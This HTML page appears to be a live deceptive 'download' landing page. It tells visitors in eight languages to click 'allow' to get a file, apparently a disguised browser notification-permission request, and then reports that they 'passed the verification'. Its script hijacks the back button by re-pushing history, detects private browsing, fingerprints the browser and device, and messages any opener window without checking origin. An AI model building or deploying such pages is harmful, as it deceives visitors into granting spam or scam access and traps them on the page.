<!DOCTYPE html>
<html>


<meta http-equiv="content-type" content="text/html;charset=UTF-8" />

<head>
    <meta charset="UTF-8">
    <title>Download</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,minimum-scale=1">
    <link rel="icon" type="image/png" sizes="16x16" href="icon.png">
    <style>
        body,
        html {
            background-color: #a9dcf8;
            height: 100%
        }

        body {
            -moz-osx-font-smoothing: grayscale;
            -moz-user-select: none;
            -ms-user-select: none;
            -webkit-font-smoothing: antialiased;
            -webkit-user-select: none;
            font: 400 16px Roboto, Arial, sans-serif;
            margin: 0;
            overflow: hidden;
            text-align: center;
            user-select: none;
            width: 100%
        }

        .isHide {
            display: none !important
        }

        .isShow {
            display: block !important
        }

        .wSvg {
            visibility: hidden
        }

        .w,
        .wSvg {
            left: 0;
            position: absolute;
            top: 0
        }

        .w {
            height: 100%;
            width: 100%
        }

        .w__t {
            font-size: 25px;
            font-weight: 700;
            left: 5px;
            line-height: 1.3;
            position: absolute;
            right: 5px;
            top: 25%
        }

        .isAndroid .w__t {
            top: 5%
        }

        .w__t span {
            color: #097fba;
            font-size: 32px;
            text-transform: uppercase
        }

        .w__t span:after,
        .w__t span:before {
            font-size: 25px
        }

        .w__t span:before {
            content: "<<"
        }

        .w__t span:after {
            content: ">>"
        }

        .ic {
            -webkit-animation: c .7s cubic-bezier(.55, .06, .68, .19) infinite alternate;
            animation: c .7s cubic-bezier(.55, .06, .68, .19) infinite alternate;
            left: 0;
            margin: auto;
            max-width: 150px;
            right: 0;
            top: 60%;
            transform: translateY(-50%);
            width: 50%
        }

        .cloud,
        .ic {
            position: absolute
        }

        .cloud {
            bottom: -30px;
            height: auto;
            width: 100%
        }

        .cloud.i-1 {
            -webkit-animation: a 2s ease-in-out infinite alternate;
            animation: a 2s ease-in-out infinite alternate;
            fill: hsla(0, 0%, 100%, .7);
            left: -20%
        }

        .cloud.i-2 {
            -webkit-animation: b 1.3s ease-in-out infinite alternate;
            animation: b 1.3s ease-in-out infinite alternate;
            fill: #fff;
            left: -5%;
            transform: scaleX(-1);
            width: 110%
        }

        .cloud.i-3 {
            -webkit-animation: a 1.7s ease-in-out infinite alternate;
            animation: a 1.7s ease-in-out infinite alternate;
            fill: hsla(0, 0%, 100%, .7);
            left: 20%
        }

        .msg {
            background-color: rgba(0, 0, 0, .75);
            color: #fff;
            height: 100%;
            left: 0;
            position: fixed;
            top: 0;
            width: 100%
        }

        .msg__tx {
            font-size: 32px;
            margin-top: 10%
        }

        @-webkit-keyframes a {
            0% {
                transform: translateX(-10px)
            }

            to {
                transform: translateX(10px)
            }
        }

        @keyframes a {
            0% {
                transform: translateX(-10px)
            }

            to {
                transform: translateX(10px)
            }
        }

        @-webkit-keyframes b {
            0% {
                transform: translateX(10px) scaleX(-1)
            }

            to {
                transform: translateX(-10px) scaleX(-1)
            }
        }

        @keyframes b {
            0% {
                transform: translateX(10px) scaleX(-1)
            }

            to {
                transform: translateX(-10px) scaleX(-1)
            }
        }

        @-webkit-keyframes c {
            0% {
                transform: translateY(-50%) scale(1)
            }

            to {
                transform: translateY(-50%) scale(1.1)
            }
        }

        @keyframes c {
            0% {
                transform: translateY(-50%) scale(1)
            }

            to {
                transform: translateY(-50%) scale(1.1)
            }
        }

        @media (min-width:425px) {
            .msg__tx {
                font-size: 52px
            }
        }

        @media (min-width:700px) {
            .w__t {
                font-size: 44px
            }

            .w__t span,
            .w__t span:after,
            .w__t span:before {
                font-size: 46px
            }
        }
    </style>
</head>

<body>
    <div class="wSvg"><svg xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 838.2 212.8">
            <defs>
                <path id="cloud" d="M713.2,213l64,0.3c1.2,0.1,2.3,0.1,3.5,0.1c31.7,0.2,57.5-25.7,57.5-57.6s-25.9-57.7-57.7-57.7 c-13.3,0-25.5,4.5-35.3,12c0-0.3,0-0.5,0-0.8c0-17-13.8-30.7-30.7-30.7c-1.9,0-3.8,0.2-5.7,0.5c0.3-1.9,0.4-3.8,0.4-5.8 c0-22.8-18.5-41.2-41.2-41.2c-22.8,0-41.2,18.5-41.2,41.2c0,1.2,0.1,2.5,0.2,3.7c-4.6-2.8-10.1-4.4-15.9-4.4 c-8,0-15.3,3.1-20.8,8.1c-6.7-24.5-29.1-42.6-55.7-42.6c-19.6,0-36.9,9.8-47.4,24.7c-1.5-21.4-19.4-38.2-41.1-38.2 c-20.9,0-38.1,15.5-40.8,35.6c-5.6-7.9-14.8-13.1-25.1-13.1c-11.6,0-21.7,6.5-27,16c-7.4-7.1-17.5-11.5-28.5-11.5 c-7.4,0-14.3,1.9-20.3,5.3c-0.8-31.2-26.3-56.3-57.7-56.3c-30.9,0-56.1,24.3-57.7,54.8c-6.9-5.2-15.5-8.3-24.8-8.3 c-22.8,0-41.2,18.5-41.2,41.2c0,2.8,0.3,5.6,0.8,8.3c-0.5,0-1.1,0-1.6,0c-17,0-30.7,13.8-30.7,30.7c0,1.5,0.1,2.9,0.3,4.4 c-9.5-7-21.3-11.1-34.1-11.1C25.8,120.6,0,146.5,0,178.3c0,31.9,15.3,36.2,48.8,34.7"></path>
            </defs>
        </svg></div>
    <div class="w"><svg class="cloud i-1" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 838.2 212.8">
            <use xlink:href="#cloud"></use>
        </svg><svg class="cloud i-2" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 838.2 212.8">
            <use xlink:href="#cloud"></use>
        </svg><svg class="cloud i-3" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 838.2 212.8">
            <use xlink:href="#cloud"></use>
        </svg><svg class="ic" xmlns="http://www.w3.org/2000/svg" version="1.1" viewBox="0 0 507.6 507.6">
            <circle fill="#aeb1b4" cx="66" cy="371" r="12"></circle>
            <path fill="#f4efef" d="M477.6,312.2l-62.8-62c-6.4-6.4-14.8-10.4-22.8-10.4H124c-7.6,0-16,4.4-23.2,10.8l-63.2,61.2l-6.8,6 c7.6-3.6,16.4-6,25.2-6h403.6c10.8,0,20.4,3.6,27.6,8.8L477.6,312.2z"></path>
            <path fill="#e8e3e3" d="M459.6,307.8c26.4,0,44,22.8,44,49.2v28c0,26.4-17.6,46.8-44,46.8H56c-26.4,0-48-20.4-48-46.8v-28 c0-26.4,21.6-49.2,48-49.2H459.6z"></path>
            <path fill="#aeb1b4" d="M449.6,351.8h-2h-122c-7.6,0-14,7.2-14,15.2v12c0,7.6,6.4,13.2,14,13.2h124c7.6,0,14-5.2,14-13.2v-10 v-2C463.6,359,457.2,351.8,449.6,351.8z M437.6,383c-6.8,0-12-5.2-12-12s5.2-12,12-12s12,5.2,12,12S444.4,383,437.6,383z"></path>
            <circle fill="#f4efef" cx="437.6" cy="371" r="8"></circle>
            <polygon fill="#54b265" points="305.2,167.8 305.2,71.8 205.2,71.8 205.2,167.8 169.6,167.8 253.6,275.8 341.6,167.8"></polygon>
            <circle fill="#54b265" cx="66" cy="371" r="14"></circle>
            <path d="M253.6,279.8L253.6,279.8c-1.2,0-2.4-0.8-3.2-1.6l-81.6-108c-0.8-1.2-1.2-2.8-0.4-4s2-2.4,3.6-2.4h27.6v-92c0-2.4,1.6-4,4-4 h104c2.4,0,4,1.6,4,4v92H340c1.6,0,2.8,0.8,3.6,2.4c0.8,1.2,0.4,3.2-0.4,4.4l-86.4,108C256,279.4,254.8,279.8,253.6,279.8z M180,171.8l73.6,97.6l78-97.6h-24c-2.4,0-4-1.6-4-4v-92h-96v92c0,2.4-1.6,4-4,4H180z"></path>
            <path d="M459.6,439.8H56C27.2,439.8,0,413,0,385v-28c0-29.6,29.2-49.2,56-49.2h348c2.4,0,4,1.6,4,4s-1.6,4-4,4H56 c-23.2,0-48,16.4-48,41.2v28c0,24,23.6,46.8,48,46.8h403.6c25.2,0,40-23.6,40-46.8v-28c0-24.8-16-41.2-40-41.2h-20c-2.4,0-4-1.6-4-4 s1.6-4,4-4h20c28.4,0,48,20.4,48,49.2v28C507.6,411.8,489.6,439.8,459.6,439.8z"></path>
            <path d="M447.6,399.8h-124c-11.2,0-20-8.8-20-20v-12c0-11.2,8.8-20,20-20h124c11.2,0,20,8.8,20,20v12 C467.6,391,458.8,399.8,447.6,399.8z M323.6,355.8c-6.8,0-12,5.2-12,12v12c0,6.8,5.2,12,12,12h124c6.8,0,12-5.2,12-12v-12 c0-6.8-5.2-12-12-12H323.6z"></path>
            <path d="M437.6,385c-7.6,0-14-6.4-14-14s6.4-14,14-14s14,6.4,14,14S445.2,385,437.6,385z M437.6,365c-3.2,0-6,2.8-6,6s2.8,6,6,6 s6-2.8,6-6S440.8,365,437.6,365z"></path>
            <path d="M66,389c-10,0-18-8-18-18s8-18,18-18s18,8,18,18S76,389,66,389z M66,361c-5.6,0-10,4.4-10,10s4.4,10,10,10s10-4.4,10-10 S71.6,361,66,361z"></path>
            <path d="M488.8,325c-1.2,0-2-0.4-2.8-1.2l-72.8-71.2c-6-5.6-13.6-8.8-21.6-8.8h-76c-2.4,0-4-1.6-4-4s1.6-4,4-4h76 c10,0,19.6,4,27.2,11.2l72.8,71.2c1.6,1.6,1.6,4,0,5.6C490.8,324.6,490,325,488.8,325z"></path>
            <path d="M27.6,323c-1.2,0-2-0.4-2.8-1.2c-1.6-1.6-1.6-4,0-5.6l71.6-68.8c8-7.6,17.6-11.6,27.2-11.6h76c2.4,0,4,1.6,4,4s-1.6,4-4,4 h-76c-10.4,0-18.8,6.8-21.6,9.6l-71.6,68.8C29.6,323,28.4,323,27.6,323z"></path>
        </svg>
        <div class="w__t"></div>
    </div>
    <div class="msg isHide">
        <div class="msg__tx"></div>
    </div>
    <script>
            var u = function() {
                    var e = location.search.split("#")[0].split("?")[1];
                    if (void 0 === e) return null;
                    var o = {};
                    return e.split("&").forEach(function(e) {
                        var n = e.split("=");
                        if (2 === n.length) o[n[0]] = n[1] || null;
                        else {
                            var t = n[0];
                            n.shift(), o[t] = n.join("=")
                        }
                    }), o
                },
                o = u();
            if (null !== o && void 0 !== o.bbr && "1" === o.bbr) {
                var r = document.title,
                    i = location.pathname + location.search;
                history.pushState(null, r, i), window.addEventListener("popstate", function() {
                    history.pushState({}, r, i)
                })
            }

            var d = function(e) {
                    null !== window.opener && void 0 !== window.opener && opener.postMessage(e, "*")
                },
                p = {
                    ua: navigator.userAgent,
                    m: function(n) {
                        var e = "normal",
                            t = "private";

                        function o() {
                            return n(t)
                        }

                        function r() {
                            return n(e)
                        }
                        if ("safari" === p.n) try {
                            return window.openDatabase(null, null, null, null), n(e)
                        } catch (e) {
                            return n(t)
                        } else if ("firefox" === p.n) {
                            var i = indexedDB.open("test.html");
                            i.addEventListener("error", o), i.addEventListener("success", r)
                        } else {
                            if ("edge" === p.n) return void 0 !== window.indexedDB || void 0 === window.PointerEvent && void 0 === window.MSPointerEvent ? n(e) : n(t);
                            if ("opera" !== p.n && "yandex" !== p.n && "chrome" !== p.n) return n("unknown");
                            window.webkitRequestFileSystem(window.TEMPORARY, 1, r, o)
                        }
                    },
                    get n() {
                        var e = !!window.opr && !!opr.addons || !!window.opera || 0 < this.ua.indexOf("OPR/index.html"),
                            n = "undefined" != typeof InstallTrigger,
                            t = /constructor/i.test(window.HTMLElement) || /(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/.test(this.ua),
                            o = !!window.chrome && /Google Inc/.test(navigator.vendor),
                            r = 0 < this.ua.indexOf("YaBrowser") || 0 < this.ua.indexOf("Yowser"),
                            i = /UBrowser/.test(this.ua),
                            a = /Edge\//.test(this.ua),
                            s = null;
                        return e ? s = "opera" : n ? s = "firefox" : r ? s = "yandex" : i ? s = "uc" : a ? s = "edge" : o ? s = "chrome" : t && (s = "safari"), s
                    },
                    get d() {
                        var n = {
                                webOS: "webOS",
                                iPhone: "iPhone",
                                iPad: "iPad",
                                iPod: "iPod",
                                mac: "(MacPPC|MacIntel|Mac_PowerPC|Macintosh)",
                                blackBerry: "BlackBerry|BB|PlayBook",
                                windows: "Windows NT",
                                windowPhone: "Windows Phone",
                                android: "Android"
                            },
                            t = null;
                        return Object.keys(n).some(function(e) {
                            if (null !== p.ua.match(new RegExp(n[e], "i"))) return t = e, !0
                        }), t
                    }
                },
                v = p,
                w = u();
            var b = {
                    k: "",
                    t: {},
                    set: function(e) {
                        void 0 !== window.navigator && void 0 !== navigator.language && (b.k = navigator.language.slice(0, 2)), void 0 === e[b.k] && (b.k = "en"), b.t = e[b.k]
                    },
                    get: function(e) {
                        return b.t[e]
                    }
                },
                y = b;
            y.set({
                en: {
                    t: "To download the file, click <span>allow</span>",
                    msg: "You have successfully passed the verification!<br>Now you can close the window."
                },
                uk: {
                    t: "Щоб завантажити файл, натисніть <span>дозволити</span>",
                    msg: "Ви успішно пройшли перевірку!<br>Тепер ви можете закрити вікно."
                },
                pl: {
                    t: "Aby pobrać plik, kliknij <span>zezwól</span>",
                    msg: "Pomyślnie przeszedłeś weryfikację!<br>Teraz możesz zamknąć okno."
                },
                ru: {
                    t: "Чтобы загрузить файл, нажмите <span>разрешить</span>",
                    msg: "Вы успешно прошли проверку!<br>Теперь вы можете закрыть окно ..."
                },
                fr: {
                    t: "Pour télécharger le fichier, cliquez sur <span>autoriser</span>",
                    msg: "Vous avez réussi le test!<br>Maintenant vous pouvez fermer la fenêtre"
                },
                de: {
                    t: "Klicken Sie zum Herunterladen der Datei auf <span>Zulassen</span>",
                    msg: "Sie haben den Test erfolgreich bestanden!<br>Jetzt können Sie das Fenster schließen"
                },
                es: {
                    t: "Para descargar el archivo, haga clic en <span>permitir</span>",
                    msg: "Has pasado la prueba con éxito!<br>Ahora puedes cerrar la ventana"
                },
                th: {
                    t: "หากต้องการดาวน์โหลดไฟล์คลิก <span>อนุญาต</span>",
                    msg: "คุณผ่านการตรวจสอบสำเร็จแล้ว!<br>ตอนนี้คุณสามารถปิดหน้าต่างได้"
                }
            }), "android" === v.d && document.body.classList.add("isAndroid"), document.querySelector(".w__t").innerHTML = y.get("t"), document.querySelector(".msg__tx").innerHTML = y.get("msg")
    </script>
</body>


</html>
